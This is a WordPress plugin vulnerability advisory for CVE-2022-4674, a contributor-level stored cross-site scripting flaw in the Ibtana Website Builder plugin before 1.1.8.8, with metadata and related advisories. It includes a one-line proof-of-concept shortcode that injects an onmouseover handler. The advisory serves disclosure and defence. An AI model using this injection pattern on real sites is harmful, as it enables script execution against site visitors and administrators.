WordPress Plugin Vulnerabilities

Ibtana – WordPress Website Builder < 1.1.8.8 - Contributor+ Stored XSS via Shortcode

Description

The plugin does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack

Proof of Concept

Exploit shortcode:

[ive t='2100-01-01' id='" onmouseover="alert(1)" style="background:red;"']

Affects Plugins

Plugin icon
ibtana-visual-editor
Fixed in 1.1.8.8

References

CVE
CVE-2022-4674

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
eda64678-81ae-4be3-941e-a1e26e54029b

Timeline

Publicly Published
2022-12-20 (about 1 years ago)
Added
2023-01-11 (about 1 years ago)
Last Updated
2023-01-11 (about 1 years ago)

Other

Published
Title
Published
2020-10-07
Title
WPBakery Page Builder < 6.4.1 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2023-02-09
Title
Scriptless Social Sharing < 3.2.2 - Contributor+ Stored XSS
Published
2023-11-06
Title
Brizy < 2.4.30 - Contributor+ Stored XSS
Published
2021-03-30
Title
Woocommerce Customers Manager < 26.6 - Authenticated Reflected Cross-Site Scripting (XSS)
Published
2017-07-03
Title
WP Statistics < 12.0.9 - Authenticated Reflected Cross-Site Scripting (XSS)